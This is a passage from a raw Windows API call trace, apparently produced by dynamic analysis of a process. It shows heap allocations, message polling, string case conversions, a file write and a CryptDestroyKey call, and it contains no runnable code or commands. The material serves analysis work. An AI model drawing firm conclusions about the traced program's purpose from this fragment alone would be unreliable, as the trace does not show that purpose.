wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0212.456] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.456] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.456] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.469] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 1 [0212.469] TranslateMessage (lpMsg=0x8cf708) returned 0 [0212.469] DispatchMessageW (lpMsg=0x8cf708) returned 0x0 [0212.469] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0212.469] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0212.469] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.469] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.469] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.471] WriteFile (in: hFile=0x504, lpBuffer=0x2aae878*, nNumberOfBytesToWrite=0x17710, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesWritten=0x8cf5e4*=0x17710, lpOverlapped=0x0) returned 1 [0212.475] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.475] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c88 [0212.475] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab380 [0212.475] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0212.475] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cd8 [0212.475] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2c0 [0212.475] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.475] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c08 [0212.475] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c18 [0212.475] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7000 [0212.475] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0212.475] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0212.475] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d88 [0212.475] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d48 [0212.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0212.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab248 [0212.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d58 [0212.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab410 [0212.476] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0212.476] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0212.476] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0212.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab248 [0212.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bb8 [0212.476] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0212.476] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0212.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d48 [0212.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ca8 [0212.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2d8 [0212.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab170 [0212.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d98 [0212.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab188 [0212.476] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0212.476] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0212.476] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0212.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bf8 [0212.477] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cf8 [0212.477] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab308 [0212.477] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2d8 [0212.477] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cc8 [0212.477] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3e0 [0212.477] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0212.477] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab290 [0212.477] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cf8 [0212.477] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d48 [0212.477] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5f0 [0212.477] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0212.477] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0212.477] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aab638, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0212.477] CryptDestroyKey (hKey=0x9e2078) returned 1 [0212.477] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x3866c48 [0212.477] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c88 [0212.477] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c48 [0212.477] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0212.477] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0212.478] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6b0 [0212.478] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cd8 [0212.478] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6b0 | out: hHeap=0x2af0000) returned 1 [0212.478] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0212.478] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0212.478] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0212.478] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0212.478] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0212.478] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cf8 [0212.478] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0212.478] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0212.478] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0212.478] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0212.478] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0212.478] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab140 | out: hHeap=0x2af0000) returned 1 [0212.478] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0212.478] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3f8 | out: hHeap=0x2af0000) returned 1 [0212.478] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab188 | out: hHeap=0x2af0000) returned 1 [0212.478] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2a8 | out: hHeap=0x2af0000) returned 1 [0212.478] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab308 | out: hHeap=0x2af0000) returned 1 [0212.479] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2d8 | out: hHeap=0x2af0000) returned 1 [0212.479] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab410 | out: hHeap=0x2af0000) returned 1 [0212.479] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3e0 | out: hHeap=0x2af0000) returned 1 [0212.479] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab170 | out: hHeap=0x2af0000) returned 1 [0212.479] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78070 | out: hHeap=0x2af0000) returned 1 [0212.479] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0212.479] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0212.479] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0212.479] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab248 | out: hHeap=0x2af0000) returned 1 [0212.479] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x3865268 [0212.479] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0212.479] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0212.479] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3866c48 | out: hHeap=0x2af0000) returned 1 [0212.479] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0212.479] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2a8 [0212.479] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c38 [0212.479] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2a8 | out: hHeap=0x2af0000) returned 1 [0212.479] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0212.479] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab290 [0212.479] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab248 [0212.480] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d48 [0212.480] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0212.480] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2a8 [0212.480] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bf8 [0212.480] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2a8 | out: hHeap=0x2af0000) returned 1 [0212.480] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0212.480] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0212.480] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2a8 [0212.480] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c98 [0212.480] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab290 | out: hHeap=0x2af0000) returned 1 [0212.480] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0212.480] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab248 | out: hHeap=0x2af0000) returned 1 [0212.480] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0212.480] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2a8 | out: hHeap=0x2af0000) returned 1 [0212.480] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782f0 | out: hHeap=0x2af0000) returned 1 [0212.480] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0212.480] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0212.480] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0212.480] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d78 [0212.480] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0212.481] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0212.481] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0212.481] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab170 [0212.481] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0212.481] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0212.481] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bd8 [0212.481] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bb8 [0212.481] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3e0 [0212.481] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab140 [0212.481] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c28 [0212.481] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab308 [0212.481] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0212.481] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d18 [0212.481] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0212.481] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0212.481] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78250 | out: hHeap=0x2af0000) returned 1 [0212.481] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0212.481] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab308 | out: hHeap=0x2af0000) returned 1 [0212.481] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab140 | out: hHeap=0x2af0000) returned 1 [0212.481] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3e0 | out: hHeap=0x2af0000) returned 1 [0212.482] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0212.482] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0212.482] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0212.482] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0212.482] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0212.482] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0212.482] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0212.482] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bd8 [0212.482] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0212.482] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78430 | out: hHeap=0x2af0000) returned 1 [0212.482] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0212.482] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab3e0 [0212.482] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x3854278 [0212.482] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0212.482] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d18 [0212.482] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ca8 [0212.482] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab248 [0212.482] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab188 [0212.482] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d78 [0212.482] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3f8 [0212.482] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0212.482] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c98 [0212.482] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0212.483] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0212.483] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782f0 | out: hHeap=0x2af0000) returned 1 [0212.483] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0212.483] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3f8 | out: hHeap=0x2af0000) returned 1 [0212.483] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab188 | out: hHeap=0x2af0000) returned 1 [0212.483] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab248 | out: hHeap=0x2af0000) returned 1 [0212.483] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0212.483] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0212.483] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0212.483] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0212.483] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0212.483] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0212.483] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c98 [0212.483] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d48 [0212.483] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3f8 [0212.483] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab410 [0212.483] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cc8 [0212.483] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab248 [0212.483] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0212.483] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab248 | out: hHeap=0x2af0000) returned 1 [0212.484] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab410 | out: hHeap=0x2af0000) returned 1 [0212.484] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3f8 | out: hHeap=0x2af0000) returned 1 [0212.484] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0212.484] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cd8 [0212.484] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0212.484] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab248 [0212.484] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab290 [0212.484] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c08 [0212.484] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2a8 [0212.484] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0212.484] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2a8 | out: hHeap=0x2af0000) returned 1 [0212.484] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab290 | out: hHeap=0x2af0000) returned 1 [0212.484] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab248 | out: hHeap=0x2af0000) returned 1 [0212.484] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0212.484] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0212.484] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0212.484] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab290 [0212.484] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab3f8 [0212.484] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab410 [0212.484] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab248 [0212.485] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab188 [0212.485] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab2a8 [0212.485] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0212.485] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab290 | out: hHeap=0x2af0000) returned 1 [0212.485] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab290 [0212.485] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2d8 [0212.485] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab140 [0212.485] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab308 [0212.485] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab6b0 [0212.485] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x38542c0 [0212.485] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782f0 | out: hHeap=0x2af0000) returned 1 [0212.485] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab4a0 [0212.485] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab620 [0212.485] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab608 [0212.485] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab680 [0212.485] RtlAllocateHeap (HeapHandle=0x2af0000, 